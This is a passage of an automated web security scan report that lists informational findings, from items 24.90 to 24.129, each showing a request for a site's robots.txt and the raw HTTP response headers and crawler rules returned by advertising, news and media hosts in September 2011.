Date: Sat, 17 Sep 2011 16:27:43 GMT
Expires: Sat, 17 Sep 2011 16:27:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
24.90. http://sana.newsinc.com/sana.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sana.newsinc.com
Path:   /sana.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sana.newsinc.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c0c0b02c59a0e5b43917105fbeae507:1309405350"
Last-Modified: Thu, 30 Jun 2011 03:42:30 GMT
Accept-Ranges: bytes
Content-Length: 28
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:23:18 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /
24.91. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 01:37:19 GMT
ETag: "1f003b-1a-49c70702b51c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
24.92. http://services.hearstmags.com/registration/get_hearst_user.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.hearstmags.com
Path:   /registration/get_hearst_user.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: services.hearstmags.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 1252
Content-Type: text/plain
Set-Cookie: cgi-session-id=E0007E52-E149-11E0-8250-D274A4818548; domain=.hearstmags.com; path=/
Set-Cookie: cgi-session-id=E0007E52-E149-11E0-8250-D274A4818548; domain=.hearstmags.com; path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 17 Sep 2011 16:27:02 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...
24.93. http://spe.atdmt.com/ds/UXUJ3UMJ3NYS/WaveForChange_BTS2011/JJ_NW_300x250_Spin.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/UXUJ3UMJ3NYS/WaveForChange_BTS2011/JJ_NW_300x250_Spin.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Thu, 22 Sep 2011 18:34:04 GMT
Date: Sat, 17 Sep 2011 16:39:32 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:
24.94. http://syn.verticalacuity.com/varw/getPromo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syn.verticalacuity.com
Path:   /varw/getPromo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: syn.verticalacuity.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:28:49 GMT
Last-Modified: Fri, 16 Sep 2011 16:35:12 GMT
Server: nginx
Content-Length: 110
Connection: Close

User-agent: *
Disallow: /web/js
Disallow: /varw
Disallow: /vat
Disallow: /mon
Disallow: /vap
Disallow: /portal
24.95. http://t.invitemedia.com/track_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 16:24:45 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
24.96. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686642

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Last-Modified: Wed, 14 Sep 2011 22:28:05 GMT
ETag: "c838007-1a-4acee4617c740"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

User-agent: *
Disallow: /
24.97. http://tcr.tynt.com/javascripts/Tracer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:27:03 GMT
ETag: "3516526417"
Expires: Sat, 17 Sep 2011 16:57:03 GMT
Last-Modified: Wed, 11 Nov 2009 19:14:11 GMT
Server: EOS (lax001/54D9)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 271
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
User-Agent: *
Disallow: /T
...[SNIP]...
24.98. http://test.ctpost.com/beacon/error  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://test.ctpost.com
Path:   /beacon/error

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: test.ctpost.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:48:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 20:19:03 GMT
Accept-Ranges: bytes
Content-Length: 185
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.ctpost.com/sitemap.xml
Sitemap: http://www.ctpost.com/sitemap_news.xml
User-agent: *
Allow: /
Disallow: /?controllerName=search
Disallow: /?controllerName=emailThis
24.99. http://tm.verticalacuity.com/vat/visitT  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tm.verticalacuity.com
Path:   /vat/visitT

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tm.verticalacuity.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:28:21 GMT
Last-Modified: Tue, 14 Jun 2011 18:18:28 GMT
Server: nginx
Content-Length: 110
Connection: Close

User-agent: *
Disallow: /web/js
Disallow: /varw
Disallow: /vat
Disallow: /mon
Disallow: /vap
Disallow: /portal
24.100. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Sat, 17 Sep 2011 16:40:13 GMT
Expires: Sat, 17 Sep 2011 16:40:13 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
24.101. http://um.simpli.fi/an  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /an

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: um.simpli.fi

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 16:30:28 GMT
Content-Type: text/plain
Content-Length: 27
Last-Modified: Thu, 24 Jun 2010 14:27:20 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /

24.102. http://us.bc.yahoo.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.bc.yahoo.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.bc.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /
24.103. http://vms.msn.com/vms.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vms.msn.com
Path:   /vms.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vms.msn.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 28 Aug 2009 08:31:44 GMT
Accept-Ranges: bytes
ETag: "01864f9b927ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:30:27 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /
24.104. http://www.adbrite.com/mb/nai_optout_check.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /mb/nai_optout_check.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:44:24 GMT
ETag: "1c62c8-54-495aa38eeddc0"
Last-Modified: Mon, 22 Nov 2010 20:37:19 GMT
Server: Apache
Content-Length: 84
Connection: close

User-agent: *
Disallow: /mb/commerce/login.php
Disallow: /zones/commerce/login.php
24.105. http://www.addthis.com/api/nai/status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.addthis.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:52 GMT
Server: Apache
Last-Modified: Thu, 08 Sep 2011 11:36:28 GMT
ETag: "3302656-7b-4ac6c78aea700"
Accept-Ranges: bytes
Content-Length: 123
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /analytics
Disallow: /test/
Disallow: /pages/toolbar
24.106. http://www.bizographics.com/nai/status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /nai/status

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:44:12 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
24.107. http://www.burstnet.com/cgi-bin/opt_out_check.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/opt_out_check.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Tue, 09 Mar 1999 03:20:24 GMT
ETag: "596a48-1a-36e49378"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:43:42 GMT
Connection: close
Set-Cookie: 56Q8=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=.www.burstnet.com

User-agent: *
Disallow: /
24.108. http://www.casalemedia.com/cgi-bin/naiOptout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.casalemedia.com
Path:   /cgi-bin/naiOptout.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.casalemedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:49 GMT
Server: Apache
Last-Modified: Mon, 25 Oct 2010 22:17:08 GMT
ETag: "64956f-4e-5a594100"
Accept-Ranges: bytes
Content-Length: 78
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /graphImages/
Disallow: /preview/
24.109. http://www.chron.com/apps/adWiz/adWiz.mpl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chron.com
Path:   /apps/adWiz/adWiz.mpl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chron.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:03 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 15 Aug 2011 19:38:07 GMT
ETag: "c8-670165c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:28:03 GMT
x-cdn: Cotendo
Connection: close

Sitemap: http://www.chron.com/sitemap.xml
Sitemap: http://www.chron.com/sitemap_news.xml
User-agent: *
Allow: /
Disallow: /?controllerName=search
Disallow: /?controllerName=emailThis
Disallow: /adtest
24.110. http://www.delish.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.delish.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 672
Content-Type: text/plain
Cache-Control: max-age=558
Date: Sat, 17 Sep 2011 16:27:44 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...
24.111. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.42.196.75
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
24.112. http://www.fetchback.com/resources/naicheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /resources/naicheck.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=0
Expires: Sat, 17 Sep 2011 16:45:22 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007.
## Updated: November 16th 2007.
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Disallow: /adodb495a
Disallow: /adodb5
Disallow: /a
...[SNIP]...
24.113. http://www.gather.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gather.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:28:44 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Content-Length: 4723
Keep-Alive: timeout=5, max=100
Connection: close
Content-Type: text/plain;charset=UTF-8

# robots.txt for gather.com


User-agent: Twiceler
Crawl-delay: 0.5

User-agent: Slurp
Crawl-delay: 3

User-agent: Speedy
Crawl-delay: 5

User-agent: *
Disallow: /viewMemberFeed.action
Di
...[SNIP]...
24.114. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sat, 17 Sep 2011 16:23:07 GMT
Expires: Sat, 17 Sep 2011 16:23:07 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
24.115. http://www.google.com/cse/brand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /cse/brand

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Sat, 17 Sep 2011 16:21:42 GMT
Expires: Sat, 17 Sep 2011 16:21:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
24.116. http://www.kaboodle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaboodle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B%00x-1032798107; Expires=Mon, 16-Sep-2013 16:30:32 GMT; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 736
Date: Sat, 17 Sep 2011 16:30:32 GMT
Connection: close

User-agent: Sosospider
Disallow: /
User-agent: Tailrank
Disallow: /pg
User-agent: *
Disallow: /za/search
Disallow: /za/editprofile
Disallow: /za/addpage
Disallow: /za/pagebadge
Disallow: /za/browse
Di
...[SNIP]...
24.117. http://www.local.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.local.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: private
Content-Type: text/plain
Date: Sat, 17 Sep 2011 16:28:14 GMT
ETag: "f56fe3bbf6dcc1:0"
Last-Modified: Thu, 08 Sep 2011 00:34:19 GMT
ntCoent-Length: 1224
Server: ECD (sjo/52C5)
Vary: Accept-Encoding
X-Cache: HIT
X-Powered-By: ASP.NET
Content-Length: 1224
Connection: close

User-agent: SBIder
Disallow: /

User-agent: Twiceler-0.9
Disallow: /

User-agent: *
Disallow: /error.aspx
Disallow: /email.aspx
Disallow: /sms.aspx
Disallow: /print.aspx
Disallow: /logout.a
...[SNIP]...
24.118. http://www.localedge.com/wdpsearch/localedgebusinesssearch.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localedge.com
Path:   /wdpsearch/localedgebusinesssearch.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localedge.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:26:16 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 29 Feb 2008 17:05:38 GMT
ETag: "ac018-38-47c83b62"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /portals/*?id*
Disallow: /*?id

24.119. http://www.manilla.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manilla.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.manilla.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:35:41 GMT
Content-Type: text/plain
Content-Length: 427
Last-Modified: Mon, 06 Jun 2011 19:49:12 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /feed

...[SNIP]...
24.120. http://www.mathtag.com/cgi-bin/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathtag.com
Path:   /cgi-bin/optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mathtag.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:48:23 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 10 Apr 2011 21:49:02 GMT
ETag: "e847f1-1a-4a0976d5a8f80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
24.121. http://www.mediaplex.com/status_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /status_pure.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 17 Jun 2010 17:57:45 GMT
ETag: "6f42f-636-4893d9359f840"
Accept-Ranges: bytes
Content-Length: 1590
Content-Type: text/plain
Cache-Control: max-age=900
Expires: Sat, 17 Sep 2011 17:01:02 GMT
Date: Sat, 17 Sep 2011 16:46:02 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.122. http://www.meebo.com/cim/sandbox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cim/sandbox.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:34:48 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Tue, 09 Aug 2011 21:34:11 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /httpstest.html
Disallow: /httpsokay.html
Disallow: /mcmd/
Disallow: /cmd/
24.123. http://www.misquincemag.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.misquincemag.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.misquincemag.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 678
Content-Type: text/plain
Cache-Control: max-age=565
Date: Sat, 17 Sep 2011 16:33:17 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...
24.124. http://www.pulse360.com/behavior/nai-opt-out.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pulse360.com
Path:   /behavior/nai-opt-out.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pulse360.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:46:01 GMT
Server: Apache
Last-Modified: Wed, 14 Sep 2011 14:26:58 GMT
ETag: "10a326-1a-8d7c5080"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /
24.125. http://www.quickandsimple.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quickandsimple.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quickandsimple.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 680
Content-Type: text/plain
Cache-Control: max-age=549
Date: Sat, 17 Sep 2011 16:33:29 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...
24.126. http://www.realage.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realage.com
Path:   /default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realage.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 673
Content-Type: text/plain
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=588
Date: Sat, 17 Sep 2011 16:30:09 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...
24.127. http://www.realmedia.com/cgi-bin/nph-verify_oo.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realmedia.com
Path:   /cgi-bin/nph-verify_oo.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realmedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:45:57 GMT
Server: Apache
Last-Modified: Fri, 19 Oct 2007 19:44:57 GMT
ETag: "e73065-90-43cddc4fa0040"
Accept-Ranges: bytes
Content-Length: 144
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /EN-US/us/channels.html
Disallow: /EN-US/tech/oas/RichMedia/local/RMG/
Sitemap: http://www.247realmedia.com/sitemap.xml
24.128. http://www.seattlepi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seattlepi.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:32 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 06 May 2011 16:57:39 GMT
ETag: "d2-6328e6c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: public
Age: 0
Expires: Sat, 17 Sep 2011 16:28:32 GMT
x-cdn: Cotendo
Connection: close

Sitemap: http://www.seattlepi.com/sitemap.xml
Sitemap: http://www.seattlepi.com/sitemap_news.xml
User-agent: *
Allow: /
Disallow: /?controllerName=search
Disallow: /?controllerName=emailThis
Disallow:
...[SNIP]...
24.129. http://www.seventeen.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seventeen.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 675
Content-Type: text/plain
Cache-Control: max-age=566
Date: Sat, 17 Sep 2011 16:34:02 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
